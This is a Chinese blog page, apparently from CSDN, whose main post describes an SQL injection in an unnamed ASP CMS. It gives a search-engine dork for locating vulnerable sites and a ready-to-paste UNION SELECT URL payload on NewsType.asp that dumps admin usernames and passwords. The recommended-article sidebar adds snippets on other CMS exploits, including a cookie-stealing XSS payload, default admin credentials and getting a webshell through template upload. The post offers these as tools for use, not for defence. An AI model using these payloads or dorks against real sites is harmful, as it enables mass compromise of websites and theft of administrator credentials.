某款asp的cms程序注射漏洞

最新推荐文章于 2025-05-16 11:30:48 发布
最新推荐文章于 2025-05-16 11:30:48 发布
阅读量1.7k 收藏
点赞数
分类专栏: 漏洞
本文介绍了一种通过特定URL参数进行SQL注入攻击的方法,利用该方法可以获取网站管理账号密码。示例中使用了特定的ASP页面进行演示,并详细展示了如何构造SQL注入语句。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

简要描述:

谷歌百度搜索关键词 inurl:HomeMarket.asp 在域名后面加上以下代码能爆破出管理帐号密码/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’



NewsType.asp?SmallClass=%27%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20%27%27=%27


风讯CMS4.0sp5 商业版的致命伤
HackCode的专栏
07-26 805
 文章作者:oldjun&flyh4t[ 脚本安全小组]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)注意:文章已经发表在《黑客手册》后由作者友情提交到邪恶八进制信息安全团队技术论坛,转载请注明出处  FooSunCMS(风讯网站管理系统)是由四川风讯科技发展有限公司自主编写的一套ASP+ACCESS/MSSQL的内容管理系统程序,FoosunCMS已形成内容管理系统整站解
安全渗透学习小结
wnma3mz的博客
10-17 6392
安全渗透学习小结 本文用以记录学习过的一些安全渗透知识。 Google Hacker 参考文章:google hacker inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用. intext: 只搜索网页部分中包含的文字(也就是忽略了标题,URL等的文字). site: 可以限制你搜索范围的域名. filetype: 搜索文件的后缀或者扩展名 intitle:...
aspcms绕过进入后台
04-11
aspcms绕过进入后台
PublicCMS 网站漏洞 任意文件写入并可提权服务器权限
网站安全专家
07-07 1707
PublicCMS是目前网站系统中第一个采用JAVA架构 TOMCAT+Apcche+Mysql数据库架构的CMS网站,开源,数据承载量大,可以承载到上千万的数据量,以及用户的网站并发可达到上千万的PV,PublicCMS静态全站html,访问速度极快,模板样式多,可自己设计,第三方的API接口也很多,深受网站运营者的喜欢。最重要的是开源,免费升级,支持动静分离,数据库及时备份等功能。SINE安全...
AspCMS系统commentList.asp存在SQL注入
最新发布
swordheart的博客
05-16 158
AspCMS的commentList.asp文件存在SQL注入,攻击者可通过构造恶意请求,利用该问题获取管理员账户的MD5加密密码。获取密码后,攻击者可进行解密并登录系统,进一步访问敏感数据。
动易CMS漏洞收集
08-01 1994
动易SiteWeaver6.8短消息0day跨站漏洞 user用户登陆,默认账号密码 admin/admin888 短消息代码模式下编辑,预览 <imgsrc="../Skin/blue/powerease_logo.gif"onload="resizepic(this);functionresizepic(){alert(document.cookie)};"&...
动易漏洞
热门推荐
asp经验积累
02-16 1万+
动易漏洞动易网站管理系统是当前中国最具性价比、最受欢迎的CMS系统和电子商务系统,目前已有超过10万个以上网站的应用规模,拥有政府、企业、科研教育和媒体等各个行业领域的几千名商业用户。其中的Region.asp的Province = Trim(Request.QueryString("Province"))语句没经过过滤的,我们可以利用构造我们的SQL语句,进行注入。总是用工具注入,水平也不会提高
PublicCMS 后台模块 站点执行脚本RCE漏洞
shelter1234567的博客
03-22 1184
PublicCMS是采用2023年主流技术开发的开源JAVACMS系统。由天津黑核科技有限公司开发,架构科学,轻松支撑上千万数据、千万PV;支持可视化编辑,多维扩展,全文搜索,全站静态化,SSI,动态页面局部静态化,URL规则完全自定义等为您快速建站,建设大规模站点提供强大驱动,也是企业级项目产品原型的良好选择。项目地址。
渗透测试
Sisyphuss Blog
06-02 4226
渗透测试概述 目录如下: 文章目录渗透测试概述简介:渗透测试与入侵的最大区别:渗透的目的:渗透可能利用的途径:常用名词:一般渗透测试流程明确目标信息收集漏洞探索方法:漏洞验证信息分析获取所需信息整理形成报告流程总结信息收集的补充:下面是一些基本的搜索语法:查找后台查看服务器使用的程序查看上传漏洞查找注射点这里推荐一个工具:heHarvester:Whois信息收集:**whois信息查询****子...
信息收集
qq_42980938的博客
10-28 5055
信息收集大全 google 语法  "" 双引号的内容不可拆分 site 指定域名 lnurl url存在的关键网页 lntext 网页正文中的关键字 Filetle 指定文件类型 lntitle 网页标题关键字 —————————————————————————————— 经常运用 搜索敏感文件 site:xxx.com filetype:doc intext:pass site:xxx.com...
信息收集----谷歌语句
残阳泼茶香的博客
06-13 2639
信息收集的方式可以分为两种:主动和被动。 主动的信息收集方式:通过直接访问、扫描网站,这种将流量流经网站的行为。 被动的信息收集方式:利用第三方的服务对目标进行访问了解,比如:Google搜索。 通过搜索引擎,有时会给我们带来意想不到的效果。 下面是一些基本的搜索语法: 查找后台 site:xx.com intext:管理 site:xx.com inurl:login si...
匿名辅助工具(应用程序dll注射器)V1.3 最新版
08-25
匿名辅助工具(应用程序dll注射器)可以将你的DLL注入指定的进程中,可通过拖放DLL文件来实现快捷注入。随便做的,喜欢就下吧,做辅助什么的,估计能帮上你的忙。当然,大家如果有什么好方法,让注射器支持更多参数调用的话,如能给我点建议,非常感谢你!! 注意:32系统使用效果最好。。。 匿名辅助工具V1.3 1.增加注入dll并调用相关函数的功能。(至多支持4个参数,包括文本型参数) 匿名辅助工具V1.2 1.增加注入EXE文件。 2.增加APC方式注入。 3.增加强制卸载一切模块。 4.增加深层模块扫描,能够扫描到隐藏的模块。
科讯kesioncms 5.5以下漏洞拿shell方法的原理总结
09-28
科讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。
动易网站管理系统vote.asp页面存在SQL注入漏洞
11-03 3886
  动易网站管理系统vote.asp页面存在SQL注入漏洞   测试系统:   动易(PowerEasy CMS SP6 071030以下版本)   安全综述:   动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。   漏洞描述:   vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不
漏洞复现】JAVA Public CMS 后台RCE漏洞
qq_18193739的博客
11-01 7042
最新版本的漏洞修复了,将CmsFileUtils文件中的代码,修改为漏洞修复前代码。
千博企业网站管理系统HitCount.Asp页面注入漏洞
fengling132的专栏
05-02 1373
程序都加入了防注入代码的,在NoSql.asp文件中7kccopyd-code If EnableStopInjection = True Then Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr Fy_In = "’|;|and|exec|insert|select|delete|update|c
动易html在线编辑器 漏洞,动易网站漏洞总结
weixin_33895652的博客
05-30 667
动易漏洞总结方法1:注册用户 keio.asAhttp://xtfhzx.com/reg/user_reg.asp上传jpg马http://www.URL.com/user/Upload.asp?dialogtype=UserBlogPic&size=5方法2:先暴所有管理员帐号。/Region.asp?Country=tt&City=whytt&Province=shi'...
动易html在线编辑器 漏洞,动易网站管理系统vote.asp页面存在SQL注入漏洞
weixin_39553904的博客
05-30 1153
动易网站管理系统vote.asp页面存在SQL注入漏洞测试系统:动易(PowerEasy CMS SP6 071030以下版本)安全综述:动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。漏洞描述:vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不严,导致可以进行mssql注入但是其语句里面过滤...
动易cms .net版本后台拿shell
aiquan9342的博客
02-10 592
PS:前提是要有IIS6.0的析漏洞 网上我找了好一会儿没有找到。直奔主题。至于怎么弄到密码,全靠坑蒙拐骗。 系统设置=》模板标签管理=》模板管理 然后选则上传模板(如果新建的话会被限制掉,会被说不允许出现小数点,分号之类的敏感符号。) 我上传了一个qwe.asp;.html 尝试了好几个都不行,是在WAP系统模板下可以,不知道是权限还是啥缘故。大家自己测...
微软发布ASP注射漏洞分析工具
8. 案例研究:研究一些著名网站或应用程序ASP注射漏洞的案例,分析攻击者是如何成功利用这些漏洞的,以及这些事件给我们的安全策略制定带来哪些启示。 由于文件名列表中只有一个可执行文件名,没有提供其他详细...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值